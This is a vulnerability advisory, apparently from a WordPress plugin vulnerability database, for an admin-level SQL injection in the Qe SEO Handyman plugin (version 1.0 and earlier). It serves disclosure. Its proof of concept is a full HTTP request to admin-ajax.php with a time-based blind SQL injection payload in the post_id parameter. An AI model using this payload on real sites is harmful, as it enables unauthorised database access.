WordPress Plugin Vulnerabilities
Qe SEO Handyman <= 1.0 - Admin+ SQLi
Description
The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wp-admin/admin.php?page=all-pages-meta Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 122 Origin: http://localhost Connection: close Cookie: [admin+] Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin action=save_all_page_meta&parms=description&meta_description=test2&post_id=2+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Krohmer, Kunal Sharma
Submitter
Daniel Krohmer
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-08 (about 1 years ago)
Added
2022-12-08 (about 1 years ago)
Last Updated
2022-12-08 (about 1 years ago)